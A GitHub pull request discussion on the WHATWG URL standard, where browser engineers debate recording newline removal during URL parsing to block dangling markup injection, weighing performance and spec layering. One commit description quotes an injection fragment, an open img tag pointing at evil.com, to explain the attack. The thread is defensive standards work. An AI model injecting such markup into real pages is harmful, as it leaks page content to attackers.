-
Notifications
You must be signed in to change notification settings - Fork 137
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Record whether the URL parser removed newlines. #284
Conversation
Apart from nits this looks reasonable. I'm guessing it's fine to leave this as a PR until there's also Fetch integration, tests, and hopefully interest from more implementers? |
As a mitigation against dangling markup attacks (which inject open tags like `<img src='https://evil.com/` that eat up subsequent markup, and exfiltrate content to an attacker), this patch tightens request processing to reject those that contain a `<` character (consistent with an HTML element), _and_ had newline characters stripped during URL parsing (see whatwg/url#284). It might be possible to URLs whose newline characters were stripped entirely, based on initial metrics. If those pan out the way I hope, we can tighten this up in the future.
Updated with a less-than flag, as discussed in whatwg/fetch#519. |
I'm ok with having a conceptual reference to something like this, but I don't think this necessarily belongs in the URL spec and I would be quite opposed to exposing this to JavaScript or something like that. WebKit's implementation doesn't actually spend the extra time to look through the URL twice to check for tabs or newlines, and we should make it as straightforward as possible to implement efficient URL parsers. |
@achristensen07 where would it belong? You can't do it after-the-fact since then newlines are gone and It would be observable to JavaScript through due to the Fetch integration. Implementing this in a single-pass implementation seems relatively straightforward though if you already do whitespace removal that way already. |
Do we want these flags to remain independent? If they're only ever used together... |
I guess it might not be completely catastrophic to add some code in all the unlikely cases of branches if a tab or newline is hit. I'm also concerned about adding another bool to a URL object which ought to remain simple and small, but maybe the slippery slope argument won't be enough to stop this. |
I believe putting this into URL makes it possible for us to avoid walking through the URL twice. As @annevk notes, after parsing the URL, the data we're looking for is actually unavailable. We'd have to have a pre-processing step in various callsites in HTML (basically wrapping the URL parsing call with something that holds a variable), which is certainly doable, but strange. We're already walking through the URL once to remove newlines; recording that state then seems reasonable.
Yeah. I realized this while playing with an implementation in Chrome; I'll update this patch accordingly. |
What does WebKit's implementation of newline removal look like now? Do y'all just farm out to NSURL?
As written here, the flag isn't exposed to the web (except implicitly via the Fetch behavior, as @annevk notes). I agree that it doesn't seem necessary to add a
Happy to have that discussion on the other patch: whatwg/fetch#519. Given that we're already doing things like https://fetch.spec.whatwg.org/#should-response-to-request-be-blocked-due-to-mime-type? there, this doesn't seem like much of a stretch, but I'm interested in hearing about possible alternatives. |
1ab78b5 changes the algorithm to bring it in line with what I expect implementations are doing today: copying non-tab/newline characters to a new string. Setting this flag turns into one extra WDYT? |
A more efficient implementation can and has been done in https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/platform/URLParser.cpp |
That's a clever implementation, thanks for sharing the link! I agree that it would be a little more work for y'all to get the behavior specced here, but I think you can still do it in a single pass. For example, I could imagine that the two-flag proposal from earlier in the thread might be reasonable:
with a corresponding value on
I agree that the benefit is something we'd need to weigh against the performance costs, and that's a judgement call that I can't make for the WebKit project. From my perspective, dangling markup is a well-known and fairly soft target for attackers. As we continue to close off other avenues for code injection (via CSP and etc.) it's only going to increase in impact. Killing off a substantial portion of this class of attack seems like it's worth some cost to URL processing speed. |
I think it might be good to point this out in the spec, and further elaborate on the nature of this flag as not relevant for the general URL parsing behavior that the URL Standard mostly covers. I would phrase it as something like this:
However in writing the above I realize I am confused. Is this a mitigation applied to Fetch, or to HTML? I think the PRs apply it to Fetch, right? (Unlike my above paragraph states.) Which means that attempting to do new WebSocket(new URL(`wss://example.com/foo\nbar>baz`).href); will fail, right? Are there tests for this (and for other non-HTML-markup-related URL parsing behaviors)? Is this even desirable? Maybe the specification layering where HTML wraps specific invocations of the URL parser would be better after all... |
That's correct. It seems simplest to make the behavior consistent at the Fetch layer.
This wouldn't fail, actually, because you're stringifying a parsed URL. That is, the result of
Writing it that way is fine, if cumbersome because of all the call sites. I don't intend to implement it that way in Blink, however. As noted above, URL parsing is expensive, and I don't think there's much appetite for doing more loops through the string. I understand that it's confusing to put a flag like this into URL if it's not used in URL, but if we put it somewhere else, I think we'd probably end up adding a note about how implementers should probably implement it as part of their URL parser. If you're happier with that as an outcome, I can type it up. |
Right, thanks. I guess I meant new WebSocket(`wss://example.com/foo\nbar>baz`); will fail. Again, is this desired behavior? Are there tests for it, and other cases like it? |
I don't think I would be. Those kind of mismatches with implementations have the tendency to completely break down over time. We could still restrict though for which callsites the flag has an effect, but it's unclear if it's worth it. |
I think so, yes. If we're going to block raw
I've added fetch tests to Chrome's tentative implementation of this behavior. Should be upstreamed shortly. |
FWIW, I agree. Doing things in URL makes much more sense to me.
I don't think that would be worthwhile, but if others do, I wouldn't strenuously object. :) |
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Commit-Queue: Mike West <[email protected]> Cr-Commit-Position: refs/heads/master@{#474249} WPT-Export-Revision: 34b8d6ab689b1ecedef332baa2a155b543f50fa7
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Reviewed-by: Jochen Eisinger <[email protected]> Cr-Commit-Position: refs/heads/master@{#474268} WPT-Export-Revision: 76847294b106c9c50e921ac523722675102d452e
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Commit-Queue: Mike West <[email protected]> Reviewed-by: Jochen Eisinger <[email protected]> Cr-Commit-Position: refs/heads/master@{#474290} WPT-Export-Revision: 9545e01418eb8738e5646b86527b986b3f2047a1
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Commit-Queue: Mike West <[email protected]> Reviewed-by: Jochen Eisinger <[email protected]> Cr-Commit-Position: refs/heads/master@{#474292} WPT-Export-Revision: 8f0c33883ba9ad137a9ed9fe8a758022230f3e06
I think since this is trying to prevent an HTML parsing attack, it belongs in the HTML spec. I oppose to putting this in the URL spec. Strings in HTML are such a small subset of the uses of URLs. |
Note: I don't oppose to preventing the attack. If I were to implement the attack prevention, I would iterate through the string that the HTML/SVG parser is about to feed into the URL parser and search for this one attack in that one place. I think the spec could be more similar to that, and if we want to instead put concepts here then they should not change the behavior of all URL parsing or require more memory for all URLs. |
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Commit-Queue: Mike West <[email protected]> Reviewed-by: Jochen Eisinger <[email protected]> Cr-Commit-Position: refs/heads/master@{#474341}
I'm sympathetic to this, but if WebKit implemented something along these lines, wouldn't y'all do it in the URL parser? I don't think Blink would accept running through the string again. In fact, I know we wouldn't, because my first pass at adding metrics for this did three string scans when completing URLs, caused a ~30% drop in parsing performance on Android and triggered exciting alerts in my inbox (https://bugs.chromium.org/p/chromium/issues/detail?id=682300). :) Given that it makes sense for the implementation to live in the URL parser, defining it there seems to also make sense. |
Our URL object is used for many things in the operating system that have nothing to do with HTML parsing. We have many public APIs for apps that make URL objects behind the scenes, for example. We also do many things with the network that have nothing to do with HTML. We would not want to slow all those things down even by decreasing instruction locality by adding instructions in unlikely branches, and we would not want to require more memory for all those URL objects. If I implemented this change in WebKit, I would have to look into how performance is actually affected and consider many things, but my initial thought is that I would just pre-scan the String given from the HTML/SVG parser to the URL parser. As one of the probably majority of URL users that does things with URLs unrelated to HTML, I do not think this belongs in the URL specification. |
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Commit-Queue: Mike West <[email protected]> Reviewed-by: Jochen Eisinger <[email protected]> Cr-Commit-Position: refs/heads/master@{#474341}
I'm very sympathetic to @achristensen07's point of view conceptually. In particular I am very happy that WebKit uses these URL objects behind the scenes for all networking; that is exactly how it should be. But I want to try to tease out the concrete objection. My take is that it should be an editorial decision (as in, up to the editor) as to where this field is stored---as long as the observable consequences are the same. I strongly urge the editor to include a note similar to mine in #284 (comment) (modified to talk about Fetch instead of HTML) so that people implementing this spec can understand that storing the flag inside the URL is a spec convenience, and they may want to make alternate implementation decisions (e.g. if they plan on flowing the URLs into places that are never Fetched). However, what I am concerned about is whether we have cross-browser agreement on applying this mitigation, and particularly the scope of it, in terms of observable consequences. My understanding is that @achristensen07 "doesn't oppose" preventing the attack. But does that include preventing it for all other places URLs are parsed and then go through the Fetch spec, as the current set of patches do? His follow-up comment "I would iterate through the string that the HTML/SVG parser is about to feed into the URL parser" implies he might not be on board with the full scope of the currently-proposed mitigation, which includes, as I said, everywhere a URL is parsed and then fed to Fetch. My go-to example in this thread has been So, @achristensen07 ---leaving editorial issues of how the spec is written aside (at least for now), what are your thoughts on the actual mitigation strategy proposed? |
Running through every URL is expensive; as I noted above, a very naive implementation caused a ~30% regression in one of Blink's parsing benchmarks. I imagine a cleverer implementation would have less impact, but it seems non-negligible. I could also imagine tagging the attribute as containing newlines and less-than characters during HTML tokenization/parsing, but that a) also seems expensive, and b) would require holding a boolean on each attribute, which seems more expensive than holding a boolean on a URL. Do you have a different approach in mind, @achristensen07? I'm not at all philosophically tied to putting this into the URL parser, but it seems like the most efficient place to do the work, especially since we're already required to remove newline characters from URLs. Why not recognize other properties at the same time? |
I think that mitigation of an HTML injection attack should go in the HTML spec. It is bad design to try and catch it at all the points of data entry into the HTML parser instead. What if someone dynamically generates a malicious HTML string with JavaScript, for example? I think it's also bad design to put more HTML concepts into the URL spec, which is used for non-HTML applications. If an implementer feels that they want to slow down their URL parser to implement it, then they can do that. I probably wouldn't. |
Let's say that we go this route, and alter https://html.spec.whatwg.org/#resolving-urls to scan the input string for characters we don't like. That seems fine in itself, and we could add a note to implementers about doing this work in parallel with whitespace removal if they feel like it (because, as we've both noted, scanning through every URL string is expensive). We could then look at the scheme of the resulting URL record and abort with a parse error for those URLs containing both character types and HTTP(S) schemes. I think that would be somewhat equivalent to the current set of patches in the main set of cases that I care about (with the caveats that the errors would look different: And actually, looking at HTML again, not everything there uses the wrapper: |
@annevk: What would you like me to do here? |
If we don't want to overload the generic URL parser we should figure out in which places this attack can take place (only HTML/SVG element attributes I assume?) and only apply the mitigation there. That might involve creating a new abstraction to invoke from these places. |
In order to support checks like those sketched out in [1], it would be helpful to record at parse-time whether or not tabs and newline characters were stripped from a given URL. This patch does so by adding a cleverly-named flag that could be referenced from other specifications. Fetch, for instance.
Still behind a flag, just updating the checks to look for both `\n` and `<` rather than just the former. This is in line with the patches up at whatwg/url#284 and whatwg/fetch#519. Intent to Remove: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. Bug: 680970 Change-Id: Ifda61a0afe1f0e97620acef7dc54b005c6f74840 Reviewed-on: https://chromium-review.googlesource.com/514024 Commit-Queue: Mike West <[email protected]> Reviewed-by: Jochen Eisinger <[email protected]> Cr-Original-Commit-Position: refs/heads/master@{#474341} Cr-Mirrored-From: https://chromium.googlesource.com/chromium/src Cr-Mirrored-Commit: 9e5ae901660de47ef1b844c6113eae91b5ae8e9e
Note that I think this got closed because @mikewest removed his fork and the default branch was renamed to main. This issue will continue to be tracked in whatwg/fetch#546. |
In order to support checks like those sketched out in 1, it would
be helpful to record at parse-time whether or not tabs and newline
characters were stripped from a given URL. This patch does so by
adding a cleverly-named flag that could be referenced from other
specifications. Fetch, for instance.
Preview | Diff